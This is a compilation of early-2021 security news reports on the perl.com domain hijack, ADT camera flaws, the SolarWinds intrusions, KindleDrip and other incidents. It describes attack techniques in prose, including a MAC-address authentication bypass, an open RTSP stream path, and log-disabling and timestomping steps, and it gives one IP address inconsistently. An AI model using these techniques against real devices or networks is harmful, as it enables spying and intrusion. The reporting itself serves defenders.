Attackers have taken over the official domain name of The Perl Foundation perl.com and pointed it to an IP address associated with malware campaigns. Users are recommended to avoid visiting the domain.
The domain Perl.com was created in 1994 and was the official website for the Perl programming language, it is registered with the registrar key-systems(.)net.
“The perl.com domain was hijacked this morning, and is currently pointing to a parking site. Work is ongoing to attempt to recover it.” reads the announcement published on the Perl NOC.
“We encourage you NOT to visit the domain, as there are some signals that it may be related to sites that have distributed malware in the past.”
The attackers changed the IP address from 151.101.2.132 to 35.186.238[.]10.
After the hackers took over the site, it was displaying a blank page whose HTML contains Godaddy parked domain scripts.
Shortly after the domain hijacking, perl.com was offered for sale for $190k on afternic.com.
Users have to avoid using perl.com as CPAN mirror and can update their mirror in CPAN.pm use o conf urllist http://www.cpan.org/
# perl -MCPAN -eshell
cpan shell -- CPAN exploration and modules installation (v2.20)
Enter 'h' for help.
cpan[1]> o conf urllist http://www.cpan.org/
Please use 'o conf commit' to make the config permanent!
cpan[2]> o conf commit
commit: wrote '/root/.cpan/CPAN/MyConfig.pm'
The 35.186.238[.]101 was associated with a domain employed in malware campaigns, including the distribution of Locky ransomware.
Stack Overflow Shares Technical Details on 2019 Hack
29.1.2021 Hacking Securityweek
Stack Overflow, the popular Q&A platform for programmers, this week shared technical information on how its systems were breached back in 2019, and it turns out that the hacker often viewed questions posted on Stack Overflow to learn how to conduct various activities on the compromised systems.
The security breach was disclosed by Stack Overflow in mid-May 2019, and a few days later it admitted that the incident resulted in the details of some users being exposed.
Stack Overflow has now published a detailed timeline of the attack, which appears to have started on April 30, 2019, and was discovered nearly two weeks later, on May 12, after a suspicious user account that had escalated privileges was noticed by the community.
The company said the attacker had managed to gain access to the personal information of 184 users — it initially said 250 users were impacted — including names, email addresses and IP addresses. There was no indication that the hacker’s goal was to obtain user information.
However, more importantly, the attacker gained access to source code, which they managed to exfiltrate. The attacker apparently started from a low-privileged account and gradually worked their way up to the point where they could steal Stack Overflow source code.
“Thankfully, none of the databases—neither public (read: Stack Exchange content) nor private (Teams, Talent, or Enterprise)—were exfiltrated. Additionally, there has been no evidence of any direct access to our internal network infrastructure, and at no time did the attacker ever have access to data in Teams, Talent, or Enterprise products,” Stack Overflow said in its blog post.
The attacker regularly viewed questions posted on Stack Overflow to obtain information, which allowed the company to “anticipate and understand the attacker’s methodology” during its investigation.
Stack Overflow says it cannot share any information about the attacker due to ongoing investigations, but the company’s description of the attack suggests that the hacker was skilled and determined.
In addition to a detailed description of the attacker’s actions, Stack Overflow’s blog post also provides information on the remediation steps taken by the company in response to the attack, as well as advice for other organizations to help them prevent these types of incidents.
ADT Security Camera Flaws Open Homes to Eavesdropping
28.1.2021 Hacking Threatpost
Researchers publicly disclosed flaws in ADT’s LifeShield DIY HD Video Doorbell, which could have allowed local attackers to access credentials, video feeds and more.
UPDATE
Researchers have publicly disclosed security flaws found in ADT-owned LifeShield security cameras, which, if exploited, could have allowed a local attacker to eavesdrop on victims’ conversations or tap into a live video feed.
The LifeShield brand is owned by security giant ADT. Specifically affected is the LifeShield DIY HD Video Doorbell, which connects to users’ Wi-Fi networks and lets them answer the door remotely using the LifeShield mobile app.
Researchers contacted ADT before publicly disclosing the flaw, and ADT has deployed patches to all impacted devices. However, security experts warn that ADT’s glitches serve as warning and are just the latest camera maker to patch similar security issues tied to connected cameras.
“Gaps in this fragile ecosystem can have unforeseen consequences and might even turn devices that protect our privacy into tools that violate it,” said researchers with Bitdefender on Wednesday.
According to ADT, 1,500 devices were affected by the flaw. These devices were part of a single model of LifeShield doorbell camera, which was marketed and sold as a residential device, and is no longer currently sold. According to ADT, its current line of DIY hardware, under the “Blue by ADT” brand, is completely new hardware and is not affected by the flaw.
What Are the Flaws
Researchers outlined several issues in the security cameras. Firstly, local attackers (i.e., connected to the same Wi-Fi network) could view credentials from the cloud for each device. The camera is identified by the cloud via its MAC address, and is then authenticated. However, after the device is set up and a password is created, the server would respond to requests that contained the wrong credentials, said researchers. Moreover, it actually responded with the last-known credentials – which could have allowed an attacker to obtain the administrator password of the camera by simply knowing its MAC address.
Finding a device’s MAC address is “not difficult at all,” Bogdan Botezatu, director of threat research and reporting for Bitdefender, told Threatpost. “Networked devices broadcast their MAC Address freely on the same LAN,” he said.
In order to exploit the flaw, “an attacker would only need to be connected to the same network as the wireless camera,” Botezatu told Threatpost. Attackers could then use a packet sniffer to scope out the requests between the camera and the server, Botezatu said: “Any packet sniffer would work. Wireshark and TCPdump would be the go-to tools in any hacker’s arsenal,” he said.
“This way, they would be able to intercept the camera communication that also contains the administrator password encoded in base64,” said Botezatu. “Once these credentials are obtained, the attacker can control the camera for as long as they share the same network (the camera’s web interface is only available on the same network).”
ADT-owned doorbell camera. Credit: ADT
Secondly, local attackers were able to gain unrestricted real-time streaming protocol (RTSP) access to the video feed. RTSP is a network control protocol utilized by communication systems to control streaming media servers.
After gaining credentials via the device MAC address, attackers could have easily accessed the interface. This would have given them unauthenticated access to the RTSP server – allowing them to access both video and audio of the camera’s streaming live feed.
Finally, after gaining administrative credentials and accessing the interface, there was an endpoint vulnerable to command injection which can be exploited to gain root access, said researchers. Stemming from unsanitized input, this flaw (CVE-2020-8101) allows local attackers to inject authenticated commands.
“The attacker gains control to the audio and video feed even in the absence of credentials, as vulnerable versions of firmware used to expose RSTP feeds on the network at rtsp://[ip-address]:554/img/media.sav,” Botezatu told Threatpost.
Disclosure to ADT
Researchers first contacted the vendor on Feb. 6 last year, and did not hear back until Aug. 3. On Aug. 17, an automatic update was released to fix the issue. Fast forward to this Wednesday, researchers finally publicly disclosed the vulnerability.
“We worked with Bitdefender to identify and quickly patch the vulnerabilities its researchers privately brought to our attention,” an ADT spokesperson told Threatpost. “All the affected doorbell cameras have been patched.”
Researcher meanwhile said that ADT “was quick to address the issues once contact was established.”
“Patches were applied to the production servers and all 1,500 affected devices within 2 weeks of being notified of the vulnerabilities,” they said.
In-Security Cameras
Various vulnerabilities continue to plague security cameras. In March 2020, Taiwan-based LILIN warned that attackers were exploiting multiple zero-day flaws in its CCTV security cameras in order to add them to various botnets. And in October 2020, Cisco issued patches for high-severity vulnerabilities plaguing its popular video surveillance IP cameras, which could allow an unauthenticated, adjacent attacker to execute arbitrary code.
However, the level of sensitive footage and audio that these devices collect also make them prime targets for disturbing attacks that impede on customers’ privacy.
Last week, former ADT employee Telesforo Aviles pleaded guilty to accessing customers’ security camera footage in order to spy on their most private moments, according to the U.S. Attorneys’ Office.
Threatpost has reached out to ADT for further comment on this latest flaw.
Updated on Jan. 27 at 3pm ET: A previous version of this article quoted a market share percentage for ADT; this percentage does not encompass for ADT’s DIY security products and DIY internet-connected security cameras.
Warning Issued Over Hackable ADT's LifeShield Home Security Cameras
28.1.2021 Hacking Thehackernews
Newly discovered security vulnerabilities in ADT's Blue (formerly LifeShield) home security cameras could have been exploited to hijack both audio and video streams.
The vulnerabilities (tracked as CVE-2020-8101) were identified in the video doorbell camera by Bitdefender researchers in February 2020 before they were eventually addressed on August 17, 2020.
LifeShield was acquired by Florida-based ADT Inc. in 2019, with Lifeshield's DIY home security solutions rebranded as Blue as of January 2020. The company's products had a 33.6% market share in the U.S. last year.
The security issues in the doorbell camera allow an attacker to
Obtain the administrator password of the camera by simply knowing its MAC address, which is used to identify a device uniquely
Inject commands locally to gain root access, and
Access audio and video feeds using an unprotected RTSP (Real-Time Streaming Protocol) server
The doorbell is designed to periodically send heartbeat messages to "cms.lifeshield.com," containing information such as the MAC address, SSID, local IP address, and the wireless signal strength. The server, in return, responds with an authentication message that can be trivially bypassed by crafting a fake request by using the device's MAC address.
"The server seems to ignore the token and checks only the MAC address when sending a response," the researchers noted, adding "the password for the administrator can be obtained by decoding the base64 authorization header received in this request."
Armed with this admin access to the camera's web interface, the attacker can leverage an HTTP interface that's vulnerable to command injection and obtain root access.
Lastly, the researchers also found that an unsecured RTSP server sans any credentials could be exploited to access the video stream at "rtsp://10.0.0.108:554/img/media.sav" using any media player such as VLC.
While patches have been applied to the production servers and all the 1,500 affected devices, with no easy way to confirm if the camera users installed the firmware updates, Bitdefender chose to delay public disclosure by more than five months.
"Customers have security choices when it comes to securing their smart homes or small businesses," the researchers said.
"Carefully researching IoT vendors for security update policies to their products, changing default passwords, separating IoTs into different subnetworks, and even regularly checking for firmware updates are only a handful of practical and hands-on security tips that anyone can adhere to."
Fidelis, Mimecast, Palo Alto Networks, Qualys also impacted by SolarWinds hack
27.1.2021 Hacking Securityaffairs
Security vendors Fidelis, Mimecast, Palo Alto Networks, and Qualys revealed that were also impacted by SolarWinds supply chain attack
The SolarWinds supply chain attack is worse than initially thought, other security providers, confirmed that they were also impacted. Mimecast, Palo Alto Networks, Qualys, and Fidelis confirmed to have installed tainted updates of the SolarWinds Orion app.
Mimecast was the first security provider of the above ones that disclosed a major security breach, it revealed that threat actors compromised its internal network and leveraged digital certificates used by one of its products to access the Microsoft 365 accounts of some of its customers.
“Microsoft recently informed us that a Mimecast-issued certificate provided to certain customers to authenticate Mimecast Sync and Recover, Continuity Monitor, and IEP products to Microsoft 365 Exchange Web Services has been compromised by a sophisticated threat actor.” reads the announcement published by Mimecast.
“Approximately 10 percent of our customers use this connection. Of those that do, there are indications that a low single digit number of our customers’ M365 tenants were targeted.”
Today, Mimecast published a new update to confirm that the incident was linked to the SolarWinds supply chain attack that resulted in the installation of tainted SolarWinds updates on its systems.
“Our investigation has now confirmed that this incident is related to the SolarWinds Orion software compromise and was perpetrated by the same sophisticated threat actor.” reads the update.
“Our investigation also showed that the threat actor accessed, and potentially exfiltrated, certain encrypted service account credentials created by customers hosted in the United States and the United Kingdom.”
Security experts from security firm NETRESEC revealed this week that security provider Qualys was also a victim of the SolarWinds attack.
Qualys confirmed to the media that a malicious version of the Orion software infected its systems.
Below the list of other impacted organizations shared by the experts:
central.pima.gov (confirmed)
cisco.com (confirmed)
corp.qualys.com (confirmed)
coxnet.cox.com (confirmed)
ddsn.gov
fc.gov
fox.local
ggsg-us.cisco.com (confirmed)
HQ.FIDELIS (confirmed)
jpso.gov
lagnr.chevrontexaco.net
logitech.local
los.local
mgt.srb.europa* (confirmed)
ng.ds.army.mil
nsanet.local
paloaltonetworks* (confirmed)
phpds.org
scc.state.va.us (confirmed)
suk.sas.com
vgn.viasatgsd.com
wctc.msft
WincoreWindows.local
The above list includes Fidelis Cybersecurity and Palo Alto Networks, the former confirmed that attack but pointed out that attackers did not were able to deploy the second-stage payload.
Palo Alto Networks representative told Forbes that it detected two SolarWinds-linked incidents that took place in September and October 2020.
“Palo Alto said its own tools detected the malware by looking at its anomalous behavior, and so it was blocked.” reported Forbes. “Our Security Operation Center then immediately isolated the server, initiated an investigation and verified our infrastructure was secure. Additionally, at this time, our SOC notified SolarWinds of the activity observed. The investigation by our SOC concluded that the attempted attack was unsuccessful and no data was compromised,” the company said.
Other security firms that were impacted in the SolarWinds supply chain attack are FireEye, Microsoft, CrowdStrike (attackers were not able to breach the security firm), and Malwarebytes (company hacked by SolarWinds attackers in a separate incident).
More Cybersecurity Firms Confirm Being Hit by SolarWinds Hack
27.1.2021 Hacking Securityweek
Cybersecurity companies Mimecast and Qualys have apparently been targeted by the threat actor that breached the systems of IT management solutions provider SolarWinds as part of a sophisticated supply chain attack. Fidelis Cybersecurity has also confirmed being hit, but it’s unclear if it was specifically targeted.
Email security company Mimecast reported a couple of weeks ago that a sophisticated threat group had obtained a certificate provided to certain customers for authenticating its products with Microsoft 365 services. The company had learned about the incident from Microsoft.
Some experts believed at the time that the incident may be related to the SolarWinds breach, and Mimecast on Tuesday confirmed that the theft of the certificate was indeed related to the SolarWinds software compromise and carried out by the same hackers.
“Our investigation also showed that the threat actor accessed, and potentially exfiltrated, certain encrypted service account credentials created by customers hosted in the United States and the United Kingdom. These credentials establish connections from Mimecast tenants to on-premise and cloud services, which include LDAP, Azure Active Directory, Exchange Web Services, POP3 journaling, and SMTP-authenticated delivery routes,” Mimecast said in a blog post.
It added, “Although we are not aware that any of the encrypted credentials have been decrypted or misused, we are advising customers hosted in the United States and United Kingdom to take precautionary steps to reset their credentials.”
SolarWinds said roughly 18,000 customers received a piece of malware named Sunburst through malicious updates for its Orion monitoring product, and a few hundred private and government organizations that represented an interest to the attackers received additional payloads. An analysis of command and control mechanisms used by Sunburst has allowed researchers to determine which organizations may have been specifically targeted by the hackers.
Based on such analysis, network forensics and security firm NETRESEC reported on Monday that one previously unidentified target of the SolarWinds hackers was information security and compliance company Qualys.
Qualys confirmed to SecurityWeek that it did find trojanized Orion software on its systems, but claimed impact was limited.
“As part of our standard research and engineering process our researchers downloaded and installed the impacted version of SolarWinds Orion software in a sandbox environment for evaluation. This sandbox environment is completely segregated from our production and customer data environments,” Qualys said. “Our security team conducted a detailed investigation and has confirmed there was no impact on our production environment.”
The analysis conducted by NETRESEC revealed nearly two dozen targets, including some major companies that have confirmed being hit, as well as several U.S. government organizations.
NETRESEC also uncovered data referencing “hq.fidelis,” which could be related to Fidelis Cybersecurity, a firm that provides threat detection and response solutions. Fidelis revealed on Tuesday that it also received a trojanized Orion update, but it currently does not believe that the attackers were able to deliver second-stage payloads. The company did not use SolarWinds products, but they were present on one machine as part of a software evaluation.
Other cybersecurity solutions providers that were targeted in the SolarWinds hack include Malwarebytes, FireEye, Palo Alto Networks, CrowdStrike, Microsoft, and Cisco. These companies either said that the attackers failed to achieve their goal or that impact was limited.
ADT Tech Hacks Home-Security Cameras to Spy on Women
23.1.2021 Hacking Threatpost
A former ADT employee pleads guilty of accessing customers’ cameras so he could spy on them.
Former ADT employee Telesforo Aviles took note when there were attractive women at a home he serviced in the Dallas area. Then he would add his personal email address to their accounts so he could have around-the-clock access to their most private moments, according to the U.S. Attorneys’ Office.
Now Aviles faces up to five years in federal prison for accessing roughly 200 accounts more than 9,600 times without consent, over a four-and-a-half year period.
“This defendant, entrusted with safeguarding customers’ homes, instead intruded on their most intimate moments,” said Acting U.S. Attorney Prerak Shah. “We are glad to hold him accountable for this disgusting betrayal of trust.”
Aviles admitted to regularly adding his own email address to customers’ ADT Pulse accounts so he could watch customers in real time without them knowing. The U.S. Attorney’s Office said Aviles would watch women naked and couples engaged in sexual activity for his own sexual gratification, they said.
“The defendant used his position of employment to illegally breach the privacy of numerous people,” FBI Dallas Special Agent in Charge Matthew J. DeSarno. The FBI works with our law-enforcement partners to thoroughly investigate all cyber-intrusions and hold criminals accountable for their actions. Cyber-intrusions do not only affect businesses, but also members of the public. We encourage everyone to practice cyber-hygiene with all their connected devices by reviewing authorized users and routinely changing passwords.”
ADT was made aware of the issue on April 23, when a customer called to report an unauthorized email on their account, the company said.
“Unfortunately, our investigation revealed that during a service visit, one of our Dallas-area technicians had added his personal email address to this customer’s account to gain unauthorized access, and he had done the same thing during service visits with other customers in the Dallas area.”
ADT Reaction
As soon as the company was made aware Aviles was terminated and reported to law enforcement.
ADT also contacted each of the customers impacted and the company is doing what they can to address their concerns.
“We apologize to the customers affected by the actions of this former employee and deeply regret this incident,” ADT’s statement said. “The ADT mission is to help protect and connect people with the things they love most. Fully earning this trust back may take time, but nothing is more important to us and to those who have served our customers under the ADT banner for the last 145 years.”
ADT joins the ranks of many other companies dealing with insider threats on security. Ticketmaster was recently on the receiving end of a $10 million fine after several employees hacked a rival company’s computer systems.
Forrester researchers recently explained that the uptick in work-from-home and remote employees is likely to amp up the rise of insider threats across all industries.
As for ADT, the company is relieved to have this case behind them, announcing the U.S. Attorney’s decision to charge their former employee.
“We are grateful to the Dallas FBI and the U.S. Attorney’s Office for holding Telesforo Aviles responsible for a federal crime.”
Intel's Early Earnings Release Triggered by Hack
23.1.2021 Hacking Securityweek
U.S. chip-making giant Intel Corp. has acknowledged a website hack and premature data disclosure forced the early release of its earnings report for the fourth quarter of 2020.
The Santa Clara, Calif.-based company had planned on making the earnings announcement after markets closed on Thursday, but discovered the website breach and the external disclosure of an infographic with sensitive financial information.
The discovery led to a decision by Intel to release the financial results six minutes before the market closed.
Intel CFO George Davis told the Financial Times that an infographic was leaked and the company believed hackers obtained it from its PR newsroom website. Intel is investigating the incident, but currently it does not believe the file was accidentally leaked.
Intel’s Q4 earnings exceeded expectations, which led to shares closing up nearly 7% on Thursday, but they fell back down on Friday following news of the possible hack.
“The negative impact on Intel’s finances after a hacker gained early access to earnings information from its website is, unfortunately, a sign of why data security has become a boardroom issue,” Max Vetter, chief cyber officer at cybersecurity skills platform Immersive Labs, said via email. “This is a prime example of an attack that affects the entire organization. While tech infrastructure may suffer at first, a crisis like this quickly evolves into a reputational, financial, legal and customer issue.”
Vetter added, “In practical terms, this means ensuring front-line teams are alert, incident response plans are up to date and organizational processes are primed. The ones who will respond best are the teams that have been drilling for such events far in advance to ensure that, if the worst does happen, they have the muscle memory to respond quickly and the agility to react when the unexpected hits.”
Hacking into newswire services can be very lucrative for cybercriminals and fraudsters. An operation disclosed in 2015 by U.S. authorities helped a group make more than $100 million after obtaining non-public earnings information from hacked newswires.
News that Intel may have been hacked comes just months after the company launched an investigation into a leak of source code and developer resources apparently originating from its Resource and Design Center.
Sharing eBook With Your Kindle Could Have Let Hackers Hijack Your Account
23.1.2021 Hacking Thehackernews
Amazon has addressed a number of flaws in its Kindle e-reader platform that could have allowed an attacker to take control of victims' devices by simply sending them a malicious e-book.
Dubbed "KindleDrip," the exploit chain takes advantage of a feature called "Send to Kindle" to send a malware-laced document to a Kindle device that, when opened, could be leveraged to remotely execute arbitrary code on the device and make unauthorized purchases.
"The code runs as root, and the attacker only needs to know the email address assigned to the victim's device," said Yogev Bar-On, a security researcher for Readlmode Labs, in a technical write-up on Thursday.
The first vulnerability lets a bad actor send an e-book to a Kindle, the second flaw allows for remote code execution while the e-book is parsed, and a third issue makes it possible to escalate privileges and run the code as the "root" user.
password auditor
When linked together, these weaknesses could be abused to swipe device credentials and make purchases on e-books sold by the attackers themselves on the Kindle store using the target's credit card.
Amazon fixed the flaws on December 10, 2020, for all Kindle models released after 2014 following Bar-On's responsible disclosure on October 17. He was also awarded $18,000 as part of the Amazon Vulnerability Research Program.
Sending a Malicious e-book from a Spoofed Address
An important aspect of the Send to Kindle feature is that it only works when a document is sent as an attachment to a "kindle.com" email address ([name]@kindle.com) from email accounts that have been previously added to an "Approved Personal Document E-mail List."
Or that's how it ideally should. What Bar-On instead found was that Amazon not only did not verify the authenticity of the email sender, an e-book that was sent from an approved-but-spoofed address automatically appeared on the library with no indication that it was received from an email message.
But pulling this off successfully requires knowledge of the destination Kindle email address, a unique "[name]@kindle.com" address that's assigned to each Kindle device or app upon registration. Although, in some cases, the name is suffixed by a random string, Bar-On argues that the entropy on most of the addresses is low enough to be trivially guessed using a brute-force approach.
However, once the e-book is sent to a victim device, the attack moves to the next stage. It exploits a buffer overflow flaw in the JPEG XR image format library as well as a privilege escalation bug in one of the root processes ("stackdumpd") to inject arbitrary commands and run the code as root.
Thus when an unsuspecting user opens the e-book and taps on one of the links in the table of contents, the Kindle would open an HTML page in the browser that contained a specially-crafted JPEG XR image and parse the image file to run the attack code — thereby allowing the adversary to steal the user's credentials, take control over the device, and virtually access personal information associated with the victim.
Amazon has now remediated the security holes by sending users a verification link to a pre-approved address in scenarios where a document is sent from an unrecognized email address.
Software updates on Kindle devices are by default downloaded and installed when connected wirelessly. Users can head to Settings → Menu → Device Info to check if their firmware is up-to-date, and if not, manually download and install the 5.13.4 update to mitigate the flaws.
Microsoft Details OPSEC, Anti-Forensic Techniques Used by SolarWinds Hackers
22.1.2021 Hacking Securityweek
Microsoft on Wednesday released another report detailing the activities and the methods of the threat actor behind the attack on IT management solutions firm SolarWinds, including their malware delivery methods, anti-forensic behavior, and operational security (OPSEC).
The attackers, which some believe to be sponsored by Russia, breached SolarWinds’ systems in 2019 and used a piece of malware named Sundrop to insert a backdoor tracked as Sunburst into the company’s Orion product. Sunburst was delivered to thousands of organizations, but a few hundred victims that presented an interest to the attackers received several other pieces of malware and many of their systems were compromised using hands-on-keyboard techniques.
In the case of these victims, the hackers used loaders named Teardrop and Raindrop to deliver Cobalt Strike payloads.
In its latest report on the SolarWinds attack, which it tracks as Solorigate, Microsoft explains how the attackers got from the Sunburst malware to the Cobalt Strike loaders, and how they kept the components separated as much as possible to avoid being detected.
“What we found from our hunting exercise across Microsoft 365 Defender data further confirms the high level of skill of the attackers and the painstaking planning of every detail to avoid discovery,” Microsoft said.
The tech giant has highlighted some of the more interesting OPSEC and anti-forensic methods used by the hackers. One technique involved ensuring that each compromised machine had unique indicators, such as different Cobalt Strike DLL implants, folder and file names, C&C domains and IPs, HTTP requests, file metadata, and launched processes.
“Applying this level of permutations for each individual compromised machine is an incredible effort normally not seen with other adversaries and done to prevent full identification of all compromised assets inside a network or effective sharing of threat intel between victims,” Microsoft noted.
The attackers also renamed their tools and placed them into folders to make them look as legitimate as possible. Other actions and activities listed by Microsoft include the following:
Before running intensive and continued hands-on keyboard activity, the attackers took care of disabling event logging using AUDITPOL and re-enabling it afterward.
In a similar way, before running noisy network enumeration activities (such as repeated NSLOOKUP or LDAP queries), the attackers carefully prepared special firewall rules to minimize outgoing packets for certain protocols. The firewall rules were also methodically removed after the network reconnaissance was completed.
Lateral movement activities were never executed without preparation. To increase the likelihood that their activities remain undetected, the attackers first enumerated remote processes and services running on the target host and decided to move laterally only after disabling certain security services.
We believe that the attackers used timestomping to change timestamps of artifacts and also leveraged professional wiping procedures and tools to complicate finding and recovering of DLL implants from affected environments.
While many of the tactics, techniques, and procedures (TTPs) leveraged by the attackers are already documented in the MITRE ATT&CK framework, Microsoft says it’s working with MITRE to ensure that the new techniques observed in these attacks will also be added to the framework.
Cybersecurity companies and researchers continue to analyze the activities of the SolarWinds hackers. FireEye this week released a white paper detailing the TTPs used by the SolarWinds hackers to target Microsoft 365 environments.
Cybersecurity firm Malwarebytes this week revealed that it too was targeted by the SolarWinds hackers — not through SolarWinds software, but by abusing applications with privileged access to Microsoft 365 and Azure environments.
Here's How SolarWinds Hackers Stayed Undetected for Long Enough
22.1.2021 Hacking Thehackernews
Microsoft on Wednesday shared more specifics about the tactics, techniques, and procedures (TTPs) adopted by the attackers behind the SolarWinds hack to stay under the radar and avoid detection, as cybersecurity companies work towards getting a "clearer picture" of one of the most sophisticated attacks in recent history.
Calling the threat actor "skillful and methodic operators who follow operations security (OpSec) best practices," the company said the attackers went out of their way to ensure that the initial backdoor (Sunburst aka Solorigate) and the post-compromise implants (Teardrop and Raindrop) are separated as much as possible so as to hinder efforts to spot their malicious activity.
"The attackers behind Solorigate are skilled campaign operators who carefully planned and executed the attack, remaining elusive while maintaining persistence," researchers from Microsoft 365 Defender Research Team, Microsoft Threat Intelligence Center (MSTIC), and Microsoft Cyber Defense Operations Center (CDOC) said.
While the exact identity of the group tracked as StellarParticle (CrowdStrike), UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), and Dark Halo (Volexity) remain unknown as yet, the U.S. government earlier this month formally tied the espionage campaign to a group likely of Russian origin.
A Variety of Tactics to Stay Undetected
Microsoft's timeline of the attacks shows that the fully-functional Sunburst DLL backdoor was compiled and deployed onto SolarWinds' Orion platform on February 20, following which it was distributed in the form of tampered updates sometime in late March.
An almost two-month-long reconnaissance period to profile its targets — something that requires a stealthy persistence to remain undetected and collect valuable information — ultimately paved the way for the deployment of Cobalt Strike implants on selected victim networks in May and the removal of Sunburst from SolarWinds build environment on June 4.
But answers as to how and when the transition from Sunburst to Raindrop occurs has yielded little definitive clues, even if it appears that the attackers deliberately separated the Cobalt Strike loader's execution from the SolarWinds process as an OpSec measure.
The idea is that in the event the Cobalt Strike implants were discovered on target networks, it wouldn't reveal the compromised SolarWinds binary and the supply chain attack that led to its deployment in the first place.
The findings also make it clear that, while the hackers relied on an array of attack vectors, the trojanized SolarWinds software formed the core of the espionage operation:
Methodic avoidance of shared indicators for each compromised host by deploying custom Cobalt Strike DLL implants on each system
Camouflaging malicious tools and binaries to mimic existing files and programs already present on the compromised machine
Disabling event logging using AUDITPOL before hands-on keyboard activity and enabling it back once complete
Creating special firewall rules to minimize outgoing packets for certain protocols before running noisy network enumeration activities that were later removed after the network survey
Executing lateral movement activities only after disabling security services on targeted hosts
Allegedly using timestomping to change artifacts' timestamps and leveraging wiping procedures and tools to prevent discovery of malicious DLL implants
Adopting a Zero Trust Mentality
"This attack was simultaneously sophisticated and ordinary," Microsoft said. "The actor demonstrated sophistication in the breadth of tactics used to penetrate, expand across, and persist in affected infrastructure, but many of the tactics, techniques, and procedures (TTPs) were individually ordinary."
To protect against such attacks in the future, the company recommends that organizations adopt a "zero trust mentality" to achieve the least privileged access and minimize risks by enabling multi-factor authentication.
"With Solorigate, the attackers took advantage of broad role assignments, permissions that exceeded role requirements, and in some cases abandoned accounts and applications which should have had no permissions at all," Alex Weinert, Microsoft's director of identity security, said.
Hackers Accidentally Expose Passwords Stolen From Businesses On the Internet
22.1.2021 Hacking Thehackernews
A new large-scale phishing campaign targeting global organizations has been found to bypass Microsoft Office 365 Advanced Threat Protection (ATP) and steal credentials belonging to over a thousand corporate employees.
The cyber offensive is said to have originated in August last year, with the attacks aimed specifically at energy and construction companies, said researchers from Check Point Research today in a joint analysis in partnership with industrial cybersecurity firm Otorio.
Although phishing campaigns engineered for credential theft are among the most prevalent reasons for data breaches, what makes this operation stand out is an operational security failure that led to the attackers unintentionally exposing the credentials they had stolen to the public Internet.
"With a simple Google search, anyone could have found the password to one of the compromised, stolen email addresses: a gift to every opportunistic attacker," the researchers said.
The attack chain commenced with phishing lures that purported to be Xerox (or Xeros) scan notifications containing an HTML file attachment, that when opened, urged recipients to enter their Office 365 passwords on a fake lookalike login page, which were then extracted and sent to a remote server in a text file.
The researchers noted the JavaScript code for exfiltrating the credentials was continuously polished and refined to the point of evading most antivirus vendors and creating a "realistic" user experience so as to trick victims into providing their login information.
To that end, the campaign banked on a mix of specialized infrastructure as well as compromised WordPress servers that were used as a "drop-zone" by the attackers to store the credentials, thereby leveraging the reputation of these existing websites to get around security software.
That the stolen credentials were stored on specific text files within these servers also means that search engines like Google can index those pages and make them accessible to any bad actor looking for compromised passwords with just an easy search.
What's more, by analyzing the different email headers used in this campaign, the researchers came to the conclusion that the emails were sent from a Linux server hosted on the Microsoft Azure platform using PHP Mailer 6.1.5 and delivered via 1&1 Ionos email servers.
"It is highly likely that the compromised IONOS account credentials were used by the attackers to send the rest of the Office 365 themed spam," the researchers noted.
To mitigate such threats, it's advised that users watch out for emails from unknown senders, lookalike domains, and spelling errors in emails or websites; refrain from clicking on suspicious links in emails; and follow password hygiene to secure accounts.
"We tend to believe that when someone steals our passwords, the worst case scenario is that the information will be used by hackers who exchange them through the dark net," Lotem Finkelsteen, head of threat intelligence at Check Point, said. "Not in this case. Here, the entire public had access to the information stolen."
"The strategy of the attackers was to store stolen information on a specific webpage that they created. That way, after the phishing campaigns ran for a certain time, the attackers can scan the compromised servers for the respective webpages, collecting credentials to steal. The attackers didn't think that if they are able to scan the Internet for those pages — Google can too. This was a clear operation security failure for the attackers."
Google Research Pinpoints Security Soft Spot in Multiple Chat Platforms
21.1.2021 Hacking Threatpost
Mystery of spying using popular chat apps uncovered by Google Project Zero researcher.
Google Project Zero researcher Natalie Silvanovich outlined what she believes is a common theme when it comes to serious vulnerabilities impacting leading chat platforms. The research, published Tuesday, identifies a common denominator within chat platforms, called “calling state machine”, which acts as a type of dial tone for messenger applications.
Silvanovich warns that this common “calling state machine” mechanism used by Signal, Google Duo, Facebook Messenger, JioChat and Mocha is ripe for abuse today and has been the common thread in a litany of past critical bugs.
For example, past bugs in the messaging apps Signal, Google Duo and Facebook Messenger, which had allowed threat actors to spy on users through unauthorized transmission of audio or video, were tied to configuration errors in the “calling state machine”. Those settings, Silvanovich said, are key to setting up simple app consent between user connections.
State Machine: Ripe for Exploit
In all, Silvanovich identified five logic vulnerabilities in the signalling state machines of seven video conferencing applications that “could allow a caller device to force a callee device to transmit audio or video data.”
While all of the vulnerabilities she identified have already been fixed, the prevalence of the errors in how state machines are implemented in these types of apps–as well as a lack of awareness of this type of bug–means that they will continue to pose a threat, Silvanovich said.
“Signalling state machines are a concerning and under-investigated attack surface of video-conferencing applications, and it is likely that more problems will be found with further research,” she wrote.
Silvanovich examined the use of WebRTC to implement videoconferencing in seven popular chat apps. In addition to those previously mentioned, she also found logic bugs in JioChat and Mocha, she said.
The vulnerabilities specific to each app already have been publicized and patched. The Signal bug, which could cause an incoming call to be answered even if the callee does not pick it up, was patched in September 2019.
The JioChat and Mocha bugs were both patched in July 2020. Both could cause the device of someone receiving a call to send audio without user interaction.
The Google Duo bug, which could cause someone making a call to leak video packets, was fixed in September 2020, while the Facebook Messenger bug, which could cause someone’s audio call to connect before he or she had answered the call, was patched about two months later.
Insecure Web Real-Time Communications
“The majority of calling state machines I investigated had logic vulnerabilities that allowed audio or video content to be transmitted from the callee to the caller without the callee’s consent,” Silvanovich wrote. “This is clearly an area that is often overlooked when securing WebRTC applications.”
Web Real-Time Communications (WebRTC) is used in the majority of video-conferencing applications to create connections by exchanging call set-up information in Session Description Protocol (SDP) between peers, a process that is called signalling. This process is implemented by another protocol, such as WebSockets for web apps or secure messaging for messaging apps, she explained.
Each of these connections must be set up in a way that there is clear consent on both sides of the message to ensure the interaction is only exchanged between the two parties. However, applications that use WebRTC usually have to maintain their own state machine to manage the user state of the application, Silvanovich said.
Human Component: ‘Developer Misunderstanding’
“How the user state maps to the WebRTC state is a design choice made by the WebRTC integrator, which has both security and performance consequences,” she wrote.
The bugs that she investigated, then, were not the result of “developer misunderstanding of WebRTC features,” Silvanovich said. They were state-machine implementation errors, plain and simple, she said.
“That said, a lack of awareness of these types of issues was likely a factor,” she wrote. “It is rare to find WebRTC documentation or tutorials that explicitly discuss the need for user consent when streaming audio or video from a user’s device.”
